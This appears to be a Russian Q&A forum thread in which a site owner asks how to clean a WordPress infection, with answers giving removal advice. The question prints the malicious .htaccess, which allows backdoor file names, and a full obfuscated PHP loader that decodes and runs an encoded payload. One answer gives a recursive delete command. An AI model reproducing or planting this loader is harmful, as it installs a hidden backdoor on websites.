Вирус генерирует htaccess и заражает сайт на wordpress. Как исправить?

Добрый день, есть сайт на wordpress в нем сел вирус, который генерирует файлы htaccess во всех папках и изменяет код index.php. Не могу определить заразу

<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>


<?php $RZXiMOEbYmVH='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$RZXiMOEbYmVH[(105/15)].$RZXiMOEbYmVH[(26-1)].$RZXiMOEbYmVH[(1*49)].$RZXiMOEbYmVH[((10*1)+18)].$RZXiMOEbYmVH[(14+22)].$RZXiMOEbYmVH[(44+5)].$RZXiMOEbYmVH[(44-13)].$RZXiMOEbYmVH[(684/18)].$RZXiMOEbYmVH[(23+4)].$RZXiMOEbYmVH[(72-(33-7))].$RZXiMOEbYmVH[(154/22)].$RZXiMOEbYmVH[(11+25)].$RZXiMOEbYmVH[(65-(62-31))].$RZXiMOEbYmVH[(26-6)].$RZXiMOEbYmVH[((27*2)-8)];$pHFdNhg9688=$RZXiMOEbYmVH[(20-9)].$RZXiMOEbYmVH[(2*4)].$RZXiMOEbYmVH[(29*1)].$RZXiMOEbYmVH[(160/4)];$MYtraky2482=$RZXiMOEbYmVH[(8*5)].$RZXiMOEbYmVH[((1+0)+2)].$RZXiMOEbYmVH[(6+(1*(95/19)))].$RZXiMOEbYmVH[(140/5)].$RZXiMOEbYmVH[(522/18)].$RZXiMOEbYmVH[(7*((7-3)-2))].$RZXiMOEbYmVH[(2*14)].$RZXiMOEbYmVH[(138/(2+4))].$RZXiMOEbYmVH[(1029/(378/18))].$RZXiMOEbYmVH[((2*189)/9)].$RZXiMOEbYmVH[(12+(0+0))].$RZXiMOEbYmVH[(31*1)].$RZXiMOEbYmVH[(48/(36/12))].$RZXiMOEbYmVH[(735/15)].$RZXiMOEbYmVH[(0+7)].$RZXiMOEbYmVH[(18+2)].$RZXiMOEbYmVH[(18-(10/5))].$RZXiMOEbYmVH[(735/15)].$RZXiMOEbYmVH[(0+(2-(1*1)))].$RZXiMOEbYmVH[(16-(3+(36/(0+18))))].$RZXiMOEbYmVH[((167-23)/18)].$RZXiMOEbYmVH[(0+(18-9))].$RZXiMOEbYmVH[(1*3)].$RZXiMOEbYmVH[(11*(1+(0/(78/13))))].$RZXiMOEbYmVH[(2*7)].$RZXiMOEbYmVH[(29*(0+1))].$RZXiMOEbYmVH[(38-(8+9))].$RZXiMOEbYmVH[(15*2)].$RZXiMOEbYmVH[(45-11)].$RZXiMOEbYmVH[(1*46)].$RZXiMOEbYmVH[(1*(17+21))].$RZXiMOEbYmVH[(78/3)].$RZXiMOEbYmVH[(21+(77/11))].$RZXiMOEbYmVH[(22+14)].$RZXiMOEbYmVH[(343/(91/13))].$RZXiMOEbYmVH[(1*1)].$RZXiMOEbYmVH[(21-10)].$RZXiMOEbYmVH[(22+(12/2))].$RZXiMOEbYmVH[(180/20)].$RZXiMOEbYmVH[(3+((0+0)*1))].$RZXiMOEbYmVH[(686/(126/9))].$RZXiMOEbYmVH[(61-(32-8))].$RZXiMOEbYmVH[(476/17)].$RZXiMOEbYmVH[((4-0)+22)].$RZXiMOEbYmVH[(((23-(2*5))/13)-0)].$RZXiMOEbYmVH[(7+(84/21))].$RZXiMOEbYmVH[(28/2)].$RZXiMOEbYmVH[(9-0)].$RZXiMOEbYmVH[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>
<?php
define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';
  • Вопрос задан
  • 4951 просмотр
Решения вопроса 1
Zettabyte
@Zettabyte
Проф. восстановление данных ▪ Вопрос? См. профиль
генерирует файлы htaccess во всех папках

Удалить их можно через SSH, командой ниже, только путь на свой поправьте и убедитесь, что нужный(-е) htaccess(-ы) не снесёте:
find /home/.../papka_saita -type f -name ".htaccess" -delete

Вот расшифровка обфусцированного кода, изучите, возможно, поможет разобраться: https://pastebin.com/C4dk2WAX

Но по-хорошему, совет выше верный - удаляйте краденое, перезаливайте сайт, обновляйте имеющееся, перепроверяйте оставшееся.
Ответ написан
Комментировать
Пригласить эксперта
Ответы на вопрос 2
artzolin
@artzolin Куратор тега WordPress
php, WordPress разработка сайтов artzolin.ru
  1. Удалить нуленые (пиратские) плагины и темы
  2. Почистить базу
  3. Перезалить файлы ядра, темы и плагинов
  4. Если тема самописная, перебрать файлы руками на наличие в ней чужого кода
Ответ написан
Комментировать
alexyarik
@alexyarik
Битрикс разработчик
Несколько раз уже отвечал, вот чек лист для вас
Как удалить вирус на сайте Wordpress?
способ восстановления сайта:
Взломали сайт на wordpress, как найти и закрыть дыры?
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы